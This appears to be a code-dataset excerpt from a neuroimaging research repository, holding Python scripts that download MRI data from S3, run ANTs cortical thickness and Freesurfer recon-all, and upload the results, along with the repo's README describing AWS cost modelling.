wf = pe.Workflow(name='thickness_workflow')\n wf.base_dir = wf_base_dir\n\n # Init log directory\n log_dir = wf_base_dir\n\n # Define antsCorticalThickness node\n thickness = pe.Node(antsCorticalThickness(), name='thickness')\n\n # Set antsCorticalThickness inputs\n thickness.inputs.dimension = 3\n thickness.inputs.segmentation_iterations = 1\n thickness.inputs.segmentation_weight = 0.25\n thickness.inputs.input_skull = input_anat #-a\n thickness.inputs.template = oasis_path + 'T_template0.nii.gz' #-e\n thickness.inputs.brain_prob_mask = oasis_path + \\\n 'T_template0_BrainCerebellumProbabilityMask.nii.gz' #-m\n thickness.inputs.brain_seg_priors = oasis_path + \\\n 'Priors2/priors%d.nii.gz' #-p\n thickness.inputs.intensity_template = oasis_path + \\\n 'T_template0_BrainCerebellum.nii.gz' #-t\n thickness.inputs.extraction_registration_mask = oasis_path + \\\n 'T_template0_BrainCerebellumExtractionMask.nii.gz' #-f\n thickness.inputs.out_prefix = 'OUTPUT_' #-o\n thickness.inputs.keep_intermediate_files = 0 #-k\n\n # Node to run ANTs 3dROIStats\n ROIstats = pe.Node(util.Function(input_names=['mask','thickness_normd'], \n output_names=['roi_stats_file'], \n function=roi_func),\n name='ROIstats')\n wf.connect(thickness, 'cortical_thickness_normalized', \n ROIstats, 'thickness_normd')\n ROIstats.inputs.mask = oasis_trt_20\n\n # Create datasink node\n datasink = pe.Node(nio.DataSink(), name='sinker')\n 
datasink.inputs.base_directory = wf_base_dir\n\n # Connect thickness outputs to datasink\n wf.connect(thickness, 'brain_extraction_mask', \n datasink, 'output.@brain_extr_mask')\n wf.connect(thickness, 'brain_segmentation', \n datasink, 'output.@brain_seg')\n wf.connect(thickness, 'brain_segmentation_N4', \n datasink, 'output.@brain_seg_N4')\n wf.connect(thickness, 'brain_segmentation_posteriors_1', \n datasink, 'output.@brain_seg_post_1')\n wf.connect(thickness, 'brain_segmentation_posteriors_2', \n datasink, 'output.@brain_seg_post_2')\n wf.connect(thickness, 'brain_segmentation_posteriors_3', \n datasink, 'output.@brain_seg_post_3')\n wf.connect(thickness, 'brain_segmentation_posteriors_4', \n datasink, 'output.@brain_seg_post_4')\n wf.connect(thickness, 'brain_segmentation_posteriors_5', \n datasink, 'output.@brain_seg_post_5')\n wf.connect(thickness, 'brain_segmentation_posteriors_6', \n datasink, 'output.@brain_seg_post_6')\n wf.connect(thickness, 'cortical_thickness', \n datasink, 'output.@cortical_thickness')\n wf.connect(thickness, 'cortical_thickness_normalized', \n datasink,'output.@cortical_thickness_normalized')\n # Connect ROI stats output text file to datasink\n wf.connect(ROIstats, 'roi_stats_file', datasink, 'output.@ROIstats')\n\n # Setup crashfile directory and logging\n wf.config['execution'] = {'hash_method': 'timestamp', \n 'crashdump_dir': '/home/ubuntu/crashes'}\n config.update_config({'logging': {'log_directory': log_dir, \n 'log_to_file': True}})\n np_logging.update_logging(config)\n\n # Return the workflow\n return wf\n\n\n# Mean ROI stats function\ndef roi_func(mask, thickness_normd):\n '''\n Method to run 3dROIstats on an input image, thickness_normd, using\n a mask, mask The output is written to the current working directory\n as 'ROIstats.txt'\n\n Parameters\n ----------\n mask : string\n filepath to the mask to be used\n thickness_normd : string\n filepath to the input image\n\n Returns\n -------\n roi_stats_file : string\n the filepath to the generated ROIstats.txt file\n '''\n\n # Import packages\n import os\n\n # Set command and execute\n cmd = '3dROIstats -mask ' + mask + ' ' + thickness_normd + ' > ' + os.getcwd() + '/ROIstats.txt'\n os.system(cmd)\n\n # Get the output\n roi_stats_file = os.path.join(os.getcwd(), 'ROIstats.txt')\n\n # Return the filepath to the output\n return roi_stats_file\n\n\n# Setup log file\ndef setup_logger(logger_name, log_file, level, to_screen=False):\n '''\n Function to initialize and configure a logger that can write to file\n and (optionally) the screen.\n\n Parameters\n ----------\n logger_name : string\n name of the logger\n log_file : string\n file path to the log file on disk\n level : integer\n indicates the level at which the logger should log; this is\n controlled by integers that come with the python logging\n package. (e.g. 
logging.INFO=20, logging.DEBUG=10)\n to_screen : boolean (optional)\n flag to indicate whether to enable logging to the screen\n\n Returns\n -------\n logger : logging.Logger object\n Python logging.Logger object which is capable of logging run-\n time information about the program to file and/or screen\n '''\n\n # Import packages\n import logging\n\n # Init logger, formatter, filehandler, streamhandler\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n\n # Write logs to file\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n # Write to screen, if desired\n if to_screen:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n\n # Return the logger\n return logger\n\n\n# Form list of anatomical s3 keys\ndef return_anat_dict(bucket, prefix):\n '''\n Function to create and return an dictionary from an S3 bucket\n prefix, where the key is the subject unique id and the value is the\n S3 key filepath\n\n Parameters\n ----------\n bucket : boto.s3.bucket.Bucket instance\n an instance of the boto S3 bucket class to download from\n prefix : string\n S3 bucket prefix to parse for anatomical data in\n\n Returns\n -------\n key_dict : dictionary\n dictionary of unique subject id's as keys and S3 key filepaths\n as values\n '''\n\n # Init variables\n key_list = []\n key_dict = {}\n\n # Check prefix\n if not prefix.endswith('/'):\n prefix = prefix + '/'\n\n # Gather all anatomical files\n for key in bucket.list(prefix=prefix):\n key_name = str(key.name)\n if 'anat' in key_name:\n key_list.append(key_name)\n print 'Adding %s to list...' % key_name\n\n # Create subject dictionary\n for key_idx, key_name in enumerate(key_list):\n\n # Grab unique subj/session as id\n key_suffix = key_name.replace(prefix, '')\n subj_id = '-'.join(key_suffix.split('/')[:2])\n\n # Add key, val to dictionary\n key_dict[subj_id] = key_name\n\n # Return dictionary\n return key_dict\n\n\n# Main routine\ndef main(index, local_dir):\n '''\n Function to download an anatomical dataset from S3 and process it\n through ANTS antsCorticalThickness.sh script, then upload the data back\n to S3\n\n Parameters\n ----------\n index : integer\n the index of the subject to process\n local_dir : string\n filepath to the local directory to store the input and\n processed outputs\n '''\n\n # Import packages\n import boto\n import logging\n import os\n import subprocess\n import time\n from CPAC.AWS import aws_utils, fetch_creds\n\n # Init variables\n creds_path = '/home/ubuntu/secure-creds/aws-keys/fcp-indi-keys2.csv'\n # Oasis template paths\n oasis_path = '/home/ubuntu/OASIS-30_Atropos_template/'\n # Bucket and S3 dataset prefix\n bucket = fetch_creds.return_bucket(creds_path, 'fcp-indi')\n prefix = 'data/Projects/CORR/RawData/IBA_TRT/'\n # Local dirs for working and download\n dl_dir = os.path.join(local_dir, 'inputs')\n\n # Setup logger\n act_log_path = '/home/ubuntu/run_act_%d.log' % index\n act_log = setup_logger('act_log', act_log_path, logging.INFO, to_screen=True)\n\n # Make input and workdirs\n if not os.path.exists(dl_dir):\n os.makedirs(dl_dir)\n\n # Get S3 anatomical paths dictionary\n anat_dict = return_anat_dict(bucket, prefix)\n\n # Get lis of unique subject ids to download\n key_list = sorted(anat_dict.keys())\n\n # Extract subject of interest\n subj_id = key_list[index]\n s3_path = anat_dict[subj_id]\n\n # Init 
working dir\n working_dir = os.path.join(local_dir, '%s_act_workdir' % subj_id)\n if not os.path.exists(working_dir):\n os.makedirs(working_dir)\n\n # Download data\n act_log.info('Downloading %s...' % s3_path)\n s3_key = bucket.get_key(s3_path)\n s3_filename = os.path.basename(s3_path)\n dl_filename = os.path.join(dl_dir, subj_id, s3_filename)\n\n # Make folders if need be\n dl_dirs = os.path.dirname(dl_filename)\n if not os.path.exists(dl_dirs):\n os.makedirs(dl_dirs)\n s3_key.get_contents_to_filename(dl_filename)\n\n # Create the nipype workflow\n act_wf = create_workflow(working_dir, dl_filename, oasis_path)\n\n # Run the workflow\n act_log.info('Running the workflow...')\n # Start timing\n start = time.time()\n act_wf.run()\n # Finish timing\n fin = time.time()\n act_log.info('Completed workflow!')\n\n # Log finish and total computation time\n elapsed = (fin - start)/60.0\n act_log.info('Total time running is: %f minutes' % elapsed)\n\n # Gather processed data\n act_log.info('Gathering outputs for upload to S3...')\n upl_list = []\n for root, dirs, files in os.walk(working_dir):\n if files:\n upl_list.extend([os.path.join(root, fl) for fl in files])\n # Update log with upload info\n act_log.info('Gathered %d files for upload to S3' % len(upl_list))\n\n # Build upload list\n upl_prefix = os.path.join(prefix.replace('RawData', 'Outputs'),\n 'ants', subj_id)\n s3_upl_list = [upl.replace(working_dir, upl_prefix) for upl in upl_list]\n\n # Upload to S3\n aws_utils.s3_upload(bucket, upl_list, s3_upl_list)\n\n\n# Run main by default\nif __name__ == '__main__':\n\n # Import packages\n import sys\n\n # Init variables\n index = int(sys.argv[1])-1\n local_dir = sys.argv[2]\n\n main(index, local_dir)\n" }, { "alpha_fraction": 0.734649121761322, "alphanum_fraction": 0.7521929740905762, "avg_line_length": 64.14286041259766, "blob_id": "6742dd0952680d2b0367b02d3932f5a43a10e7ed", "content_id": "83661d1a59f9f137370dfdc4b21cacce3f58f315", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4560, "license_type": "permissive", "max_line_length": 205, "num_lines": 70, "path": "/README.md", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# Clark2015_AWS\nAnalyzing neuroimaging data in the AWS cloud\n\nContents\n========\n\ndata-preproc\n------------\n- aws_pipelines.xlsx - Spreadsheet showing the pipeline runtime parameters on AWS for CPAC, Freesurfer (w/ and w/o GPU), ANTs, and QAP\n\n results\n -------\n - act_runtimes.png - histogram of the runtimes for completing ANTs cortical thickness on IBA_TRT subjects\n - act_runtimes.yml - YAML containing the runtimes in hours\n - adhd200_cpac_benchmark.results - summary of the runtime results for the CPAC run on subjects from the ADHD200 dataset\n - adhd200_cpac_runtimes.png - histogram of the runtime to complete running CPAC on subjects from the ADHD200 dataset\n - adhd200_cpac_runtimes.yml - YAML containing the runtimes in minutes\n - adhd200_fail_logs.yml - YAML containing s3 paths to the log files from the ADHD200 CPAC run\n - adhd200_outdirs_mb.png - histogram of the output directory sizes of the CPAC run on the ADHD200 subjects in MB\n - adhd200_outdirs_mb.yml - YAML of the directory sizes in MB\n - adhd200_upl_runtimes.png - histogram of the runtimes, in minutes, for output CPAC data to be uploaded to S3 from AWS EC2 instances\n - adhd200_upl_runtimes.yml - YAML of the runtimes in minutes\n - freesurfer_runtimes.png - histogram of the runtime to complete running 'recon-all' on all 50 of the subjects from IBA_TRT\n - fs_gpu_runtimes.png - histogram of runtimes for completing 'recon-all' using GPU optimizations on IBA_TRT\n - fs_gpu_runtimes.yml - YAML containing the runtimes in hours\n - fs_runtimes.yml - YAML containing the runtimes in hours\n\n scripts\n -------\n - act_interface.py - Nipype interface made to work with the ANTs cortical thickness extraction script found [here](https://raw.githubusercontent.com/stnava/ANTs/master/Scripts/antsCorticalThickness.sh)\n - act_run.py - Python script to run the ANTs cortical thickness script and upload results to S3\n - act_run.sge - SGE bash script to launch act_run.py over parallel HPC nodes via SGE\n - download_run_fs_gpu.py - script to download and run Freesurfer's 'recon-all' command using GPU-optimized binaries instead of CPU ones.\n - download_run_fs.py - script to download and run Freesurfer's 'recon-all' command on the CORR IBA_TRT data and then uploads the results to S3 on the 'fcp-indi' bucket\n - download_run_fs.sge - SGE bash script to launch download_run_fs.py over parallel HPC nodes via SGE\n - get_run_stats.py - Python script to pull data from pipeline log files and plot the runtime data\n\npaper\n-----\nTranscript related to the AWS paper (now on Google docs)\n\nposter\n------\nLaTeX files and images used to create the AWS/NDAR poster for OHBM 2015 and Neuroinformatics 2015\n\nspot-model\n----------\n- record_spot_price.py - Python module to record the spot price history from AWS and save histories to csv dataframes and log files\n- run_spot_sims.py - Python script to run AWS simulations over spot history in parallel using a configuration file and spot history csv\n- run_static_model.py - Python script to run the AWS static pricing model given a per-hour price, availability zone, and configuration file\n- S3_costs_2mm.R - R script that models and plots AWS costs based on CPAC runtimes for 2mm images\n- spot_sim_plots.R - R script to create static model plots for the poster\n- spot_sim_plots_Sw.R - R script to create static and simulation model plots for paper\n- spot_price_model.py - Python module to simulate job submissions over spot history and calculate runtimes and costs\n- utils.py - Python module with various utilities related to the AWS spot simulations, including dataframe consolidation and parallel processing\n\n configs\n -------\n ANTs, CPAC, and Freesurfer spot simulation config files with the runtime details for estimating time and cost of running on AWS\n\n csvs\n ----\n - ants_avg_simgs_and_static.csv - ANTs mean and median spot simulation averages alongside static runtimes and costs\n - c3.8xlarge-allzones-avgs_03-15_09-04-2015.csv - Mean and median spot history price for the c3.8xlarge Linux/UNIX instance across availability zones from March 3 to Sept 4 2015\n - cpac_avg_simgs_and_static.csv - C-PAC mean and median spot simulation averages alongside static runtimes and costs\n - fs_avg_simgs_and_static.csv - Freesurfer mean and median spot simulation averages alongside static runtimes and costs\n\n plots\n -----\n Plots of the cost and times across number of datasets and bid ratios as well as mean simulation vs static costs and times\n" }, { "alpha_fraction": 0.6313799619674683, "alphanum_fraction": 0.6331658363342285, "avg_line_length": 28.119266510009766, "blob_id": "51a4ffbacfae7d8e6a810858e9a649c2b1ccea0f", "content_id": "8039e47d4f1d5be862a6244f5a798c3e7b7d6f6e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 6348, "license_type": "permissive", "max_line_length": 88, "num_lines": 218, "path": "/data-preproc/scripts/download_run_fs.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# download_run_fs.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module downloads anatomical data from S3 and runs freesurfer's\nrecon-all -all command on it\n\nUsage:\n python download_run_fs <index> <local_dir>\n'''\n\n# Setup log file\ndef setup_logger(logger_name, log_file, level, to_screen=False):\n '''\n Function to initialize and configure a logger that can write to file\n and (optionally) the screen.\n\n Parameters\n ----------\n logger_name : string\n name of the logger\n log_file : string\n file path to the log file on disk\n level : integer\n indicates the level at which the logger should log; this is\n controlled by integers that come with the python logging\n package. (e.g. logging.INFO=20, logging.DEBUG=10)\n to_screen : boolean (optional)\n flag to indicate whether to enable logging to the screen\n\n Returns\n -------\n logger : logging.Logger object\n Python logging.Logger object which is capable of logging run-\n time information about the program to file and/or screen\n '''\n\n # Import packages\n import logging\n\n # Init logger, formatter, filehandler, streamhandler\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n\n # Write logs to file\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n # Write to screen, if desired\n if to_screen:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n\n # Return the logger\n return logger\n\n\n# Form list of anatomical s3 keys\ndef return_anat_dict(bucket, prefix):\n '''\n Function to create and return an dictionary from an S3 bucket\n prefix, where the key is the subject unique id and the value is the\n S3 key filepath\n\n Parameters\n ----------\n bucket : boto.s3.bucket.Bucket instance\n an instance of the boto S3 bucket class to download from\n prefix : string\n S3 bucket prefix to parse for anatomical data in\n\n Returns\n -------\n key_dict : dictionary\n dictionary of unique subject id's as keys and S3 key filepaths\n as values\n '''\n\n # Init variables\n key_list = []\n key_dict = {}\n\n # Check prefix\n if not prefix.endswith('/'):\n prefix = prefix + '/'\n\n # Gather all anatomical files\n for key in bucket.list(prefix=prefix):\n key_name = str(key.name)\n if 'anat' in key_name:\n key_list.append(key_name)\n print 'Adding %s to list...' 
% key_name\n\n # Create subject dictionary\n for key_idx, key_name in enumerate(key_list):\n\n # Grab unique subj/session as id\n key_suffix = key_name.replace(prefix, '')\n subj_id = '-'.join(key_suffix.split('/')[:2])\n\n # Add key, val to dictionary\n key_dict[subj_id] = key_name\n\n # Return dictionary\n return key_dict\n\n\n# Main routine\ndef main(index, local_dir):\n '''\n Function to download an anatomical dataset from S3 and process it\n through Freesurfer's recon-all command, then upload the data back\n to S3\n\n Parameters\n ----------\n index : integer\n the index of the subject to process\n local_dir : string\n filepath to the local directory to store the input and\n processed outputs\n '''\n\n # Import packages\n import boto\n import logging\n import os\n import subprocess\n from CPAC.AWS import aws_utils, fetch_creds\n\n # Init variables\n creds_path = '/home/ubuntu/secure-creds/aws-keys/fcp-indi-keys2.csv'\n bucket = fetch_creds.return_bucket(creds_path, 'fcp-indi')\n prefix = 'data/Projects/CORR/RawData/IBA_TRT/'\n dl_dir = os.path.join(local_dir, 'inputs')\n subjects_dir = os.path.join(local_dir, 'subjects')\n\n # Setup logger\n fs_log_path = os.path.join(local_dir, 'download_run_fs_%d.log' % index)\n fs_log = setup_logger('fs_log', fs_log_path, logging.INFO, to_screen=True)\n\n # Make input and subject dirs\n if not os.path.exists(dl_dir):\n os.makedirs(dl_dir)\n\n if not os.path.exists(subjects_dir):\n os.makedirs(subjects_dir)\n\n # Get S3 anatomical paths dictionary\n anat_dict = return_anat_dict(bucket, prefix)\n\n # Get list of unique subject ids to download\n key_list = sorted(anat_dict.keys())\n\n # Extract subject of interest\n subj_id = key_list[index]\n s3_path = anat_dict[subj_id]\n\n # Download data\n fs_log.info('Downloading %s...' % s3_path)\n s3_key = bucket.get_key(s3_path)\n s3_filename = os.path.basename(s3_path)\n dl_filename = os.path.join(dl_dir, subj_id, s3_filename)\n\n # Make folders if need be\n dl_dirs = os.path.dirname(dl_filename)\n if not os.path.exists(dl_dirs):\n os.makedirs(dl_dirs)\n s3_key.get_contents_to_filename(dl_filename)\n\n # Execute recon-all\n cmd_list = ['recon-all', '-openmp', '4', '-i', dl_filename,\n '-subjid', subj_id, '-qcache', '-all']\n cmd_str = ' '.join(cmd_list)\n fs_log.info('Executing %s...' % cmd_str)\n # Use subprocess to send command and communicate outputs\n proc = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n # Stream output\n while proc.poll() is None:\n stdout_line = proc.stdout.readline()\n fs_log.info(stdout_line)\n\n proc.wait()\n\n # Gather processed data\n fs_log.info('Gathering outputs for upload to S3...')\n upl_list = []\n subj_dir = os.path.join(subjects_dir, subj_id)\n for root, dirs, files in os.walk(subj_dir):\n if files:\n upl_list.extend([os.path.join(root, fl) for fl in files])\n # Update log with upload info\n fs_log.info('Gathered %d files for upload to S3' % len(upl_list))\n\n # Build upload list\n upl_prefix = os.path.join(prefix.replace('RawData', 'Outputs'),\n 'freesurfer', subj_id)\n s3_upl_list = [upl.replace(subj_dir, upl_prefix) for upl in upl_list]\n\n # Upload to S3\n aws_utils.s3_upload(bucket, upl_list, s3_upl_list, overwrite=True, make_public=True)\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import sys\n\n # Init variables\n index = int(sys.argv[1])-1\n local_dir = sys.argv[2]\n\n main(index, local_dir)\n" } ]
19
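Both R plotting scripts in the record above reduce the raw simulation output with plyr::ddply before plotting (see aggregate_df in spot_sim_plots_Sw.R). For readers following along in Python rather than R, here is a minimal, hedged sketch of that same grouping step in pandas; the column names are taken from the ddply call, while the file name 'sim_results.csv' is a hypothetical placeholder rather than a file shipped with the repo:

```python
# Hedged sketch: a pandas equivalent of the ddply aggregation in
# spot_sim_plots_Sw.R. Column names mirror the R code; "sim_results.csv"
# is a hypothetical placeholder.
import pandas as pd

def aggregate_df(csv_path, func_name='mean'):
    """Aggregate per-run results by availability zone, bid ratio, and dataset count."""
    full_df = pd.read_csv(csv_path)
    stat_cols = ['instance_cost', 'num_interrupts', 'per_node_cost',
                 'run_time', 'total_cost', 'total_time', 'wait_time']
    # func_name is 'mean' or 'median', matching the two branches in the R version
    grouped = full_df.groupby(['av_zone', 'bid_ratio', 'num_datasets'])[stat_cols]
    df_agg = grouped.agg(func_name)
    df_agg.columns = ['%s_%s' % (func_name, col) for col in df_agg.columns]
    return df_agg.reset_index()

# Example usage: agg = aggregate_df('sim_results.csv', 'median')
```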
jh-001/faceRecognition_NIR-VIS
https://github.com/jh-001/faceRecognition_NIR-VIS
bbb6cd6ef62a3012e07d5f39e90451eb1cfccd29
4b162c25ec042708ab6ec655ab0712554e053a13
955ebe401369482bd663b965431bb2bcdf7f7ca1
refs/heads/master
2023-03-23T00:25:56.308431
2019-03-18T08:52:58
2019-03-18T08:52:58
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5186424255371094, "alphanum_fraction": 0.5635755062103271, "avg_line_length": 33.278690338134766, "blob_id": "d0e64237d7ed06a36c86ab8a13d96659a4d3fd04", "content_id": "e30d31fe81ff3e601c702696cbe80ef6ac63376b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2092, "license_type": "no_license", "max_line_length": 106, "num_lines": 61, "path": "/models/IDR.py", "repo_name": "jh-001/faceRecognition_NIR-VIS", "src_encoding": "UTF-8", "text": "'''\nimplement paper 2017 AAAI Learning Invariant Deep Representation for NIR-VIS Face Recognition\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass mfm(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1):\n super(mfm, self).__init__()\n self.out_channels = out_channels\n if type == 1:\n self.filter = nn.Conv2d(in_channels, 2 * out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding)\n else:\n self.filter = nn.Linear(in_channels, 2 * out_channels)\n\n def forward(self, x):\n x = self.filter(x)\n out = torch.split(x, self.out_channels, 1)\n return torch.max(out[0], out[1])\n\n\nclass group(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\n super(group, self).__init__()\n self.conv_a = mfm(in_channels, in_channels, 1, 1, 0)\n self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding)\n\n def forward(self, x):\n x = self.conv_a(x)\n x = self.conv(x)\n return x\n\n\nclass network_9layers(nn.Module):\n def __init__(self, num_classes=79077):\n super(network_9layers, self).__init__()\n self.features = nn.Sequential(\n mfm(1, 48, 5, 1, 2),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n group(48, 96, 3, 1, 1),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n group(96, 192, 3, 1, 1),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n group(192, 128, 3, 1, 1),\n group(128, 128, 3, 1, 1),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n )\n self.fc1 = mfm(8 * 8 * 128, 256, type=0)\n self.fc2 = nn.Linear(256, num_classes)\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = F.dropout(x, training=self.training)\n out = self.fc2(x)\n return out, x\n\n" } ]
1
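The IDR.py record above defines a light-CNN-style network whose mfm ("max-feature-map") blocks produce 2*out_channels activations and keep the element-wise max of the two halves. A short, hedged smoke test of the tensor shapes follows; the 128x128 grayscale input size is an inference from the 8*8*128 fc1 width (four ceil-mode 2x poolings: 128 -> 64 -> 32 -> 16 -> 8), not something stated in the repo:

```python
# Hedged shape check for network_9layers; the input size is an inference,
# and the import path assumes the repo's /models/IDR.py layout.
import torch
from models.IDR import network_9layers

model = network_9layers(num_classes=10)   # num_classes shrunk for the test
x = torch.randn(2, 1, 128, 128)           # batch of 2 single-channel images
logits, feats = model(x)
assert logits.shape == (2, 10)            # class scores from fc2
assert feats.shape == (2, 256)            # 256-d embedding from the mfm fc1
```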
treuille/img-to-base64
https://github.com/treuille/img-to-base64
4d736331001b337aa700636e81780dc1b528f5af
dc41f4300cc1e8debb0c0566d034604413423f53
0dd4eda6ae16f610224dcc52ab237452f06775d6
refs/heads/main
2022-12-21T01:53:09.927011
2020-10-08T02:26:44
2020-10-08T02:26:44
302,056,094
1
1
Apache-2.0
2020-10-07T14:07:27
2020-10-08T02:27:56
2020-10-08T02:27:54
Python
[ { "alpha_fraction": 0.7323943376541138, "alphanum_fraction": 0.7887324094772339, "avg_line_length": 34.5, "blob_id": "3771e3d4f40298ba3bdf285ea96b1bd4144aed50", "content_id": "72d183d7416741dc7de07b07bb86cdd1fb49a29c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 71, "license_type": "permissive", "max_line_length": 54, "num_lines": 2, "path": "/README.md", "repo_name": "treuille/img-to-base64", "src_encoding": "UTF-8", "text": "# img-to-base64\nA little Streamlit app that converts images to base64.\n" }, { "alpha_fraction": 0.6479859948158264, "alphanum_fraction": 0.6587857604026794, "avg_line_length": 29.58035659790039, "blob_id": "11224751ef01fa4c2a37f6f632c5b2e5be5399af", "content_id": "b897d23f4f245241e28233f41b5e3e76abc644d5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3426, "license_type": "permissive", "max_line_length": 144, "num_lines": 112, "path": "/streamlit_app.py", "repo_name": "treuille/img-to-base64", "src_encoding": "UTF-8", "text": "import streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport base64\nfrom io import BytesIO\nimport yaml\nimport textwrap\nimport streamlit.components.v1 as components\n\[email protected]\ndef load_image(filename, new_img_width, remove_top_pixels):\n # Shave off some pixels from the top\n im = Image.open(open(filename, 'rb'))\n im = np.array(im)[remove_top_pixels:,:,:]\n im = Image.fromarray(im)\n\n # Downsample the image\n old_img_width, old_img_height = im.size\n new_img_height = (old_img_height * new_img_width) // old_img_width\n im = im.resize((new_img_width, new_img_height), Image.LANCZOS)\n\n # All done!\n return im\n\ndef base64_img_html(im, width):\n io_buffer = BytesIO()\n st.experimental_show(type(im))\n im.save(io_buffer, format=\"JPEG\")\n img_str = base64.b64encode(io_buffer.getvalue()).decode(\"utf-8\")\n st.experimental_show(type(img_str))\n img_tag = f'<img style=\"border: 1px solid #ddd\" src=\"data:image/jpeg;base64,{img_str}\" />'\n # img_tag = f'<img style=\"width:{width}px\" src=\"https://raw.githubusercontent.com/treuille/img-to-base64/main/screenshot-1-face-gan.png\"/>' \n return img_tag\n\ndef captioned_img_html(app_num, base64_img, name, live_url, git_url, width):\n return textwrap.dedent(f'''\n <div style=\"width:{width}px; margin-right:20px; margin-bottom:20px\">\n {base64_img}\n <div style=\"width:{width}px; text-align:center; margin-top:3px; font-family: Sans-Serif; font-size: 10px\">\n ({app_num})\n <a href=\"{live_url}\">Live App</a> |\n <a href=\"{git_url}\">Github Source</a>\n </div>\n </div>\n ''')\n# st.code(img_tag, language='html')\n\n\n# Remove the file uploader deprecation warning.\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\"# Grid Figure Creator\"\n\n# Sidebar configuration\nshow_config = st.sidebar.checkbox('Show raw config', True)\n\n# Load the config information from the user.\nconfig = yaml.load(open('table_config.yaml'))\nnew_img_width = config['img-width']\nremove_top_pixels = config['remove-top-pixels']\n\nst.experimental_show(new_img_width)\nst.experimental_show(remove_top_pixels)\n\n# Create the images\nfigure_html = \"\"\nfor img_num, img_info in enumerate(config['imgs']):\n image = load_image(img_info['filename'], new_img_width, remove_top_pixels)\n st.image(image)\n st.experimental_show(type(image))\n base64_img = base64_img_html(image, new_img_width)\n captioned_img = captioned_img_html(img_num + 1,\n 
base64_img, img_info['name'],\n img_info['live-url'], img_info['git-url'],\n new_img_width)\n figure_html += captioned_img + '\\n'\n\n# Wrap everything in a giant div\nfigure_html = textwrap.dedent(f'''\n<div style=\"display: flex; flex-wrap: wrap; justify-content: center\">\n{textwrap.indent(figure_html, prefix=\" \")}\n</div>\n''')\n\ncomponents.html(figure_html, height=400)\nst.code(figure_html, language='html')\n\n\n# Show the raw configuration data at the bottom.\nif show_config:\n st.write('## Raw config', config)\n\nst.stop()\n\n# \"## Input\"\n# \n# IMAGE_FORMATS = ['png', 'jpg', 'jpeg']\n# file = st.file_uploader('Select an image file.', type=IMAGE_FORMATS)\n# \n# \n# st.experimental_show(remove_top_pixels)\n# st.experimental_show(new_img_width)\n# \n# if st.checkbox('Show help.'):\n# st.help(st.file_uploader)\n# \n# if not file:\n# st.warning(\"Please upload an image file.\")\n# st.stop()\n# \n# \"## Output\"\n# \n" } ]
2
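The img-to-base64 record above centers on one conversion, implemented in base64_img_html: serialize a PIL image to JPEG in memory and embed it in an <img> tag as a base64 data URI. A standalone, hedged sketch of just that step is below; the convert('RGB') call is an addition to guard against RGBA inputs (JPEG has no alpha channel), and 'screenshot.png' is a placeholder filename:

```python
# Hedged standalone sketch of the PIL -> base64 data-URI step from
# streamlit_app.py; convert('RGB') and the filename are assumptions.
import base64
from io import BytesIO
from PIL import Image

def img_to_data_uri(im):
    buf = BytesIO()
    im.convert('RGB').save(buf, format='JPEG')             # encode in memory
    b64 = base64.b64encode(buf.getvalue()).decode('utf-8')
    return '<img src="data:image/jpeg;base64,%s" />' % b64

# Example usage: print(img_to_data_uri(Image.open('screenshot.png')))
```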
FrancoCuevas444/TimeTable-Generator
https://github.com/FrancoCuevas444/TimeTable-Generator
a68f4215c01309686ef4503ee4ca7fdf0b8a44ce
628e80b2d719d4aabfa625d3bdd221c8226fcdc1
95b771398e8d9c93397df0a5732828b7e12b571b
refs/heads/master
2020-04-02T17:56:58.504886
2017-10-19T02:47:16
2017-10-19T02:47:16
97,790,274
0
0
null
null
null
null
null
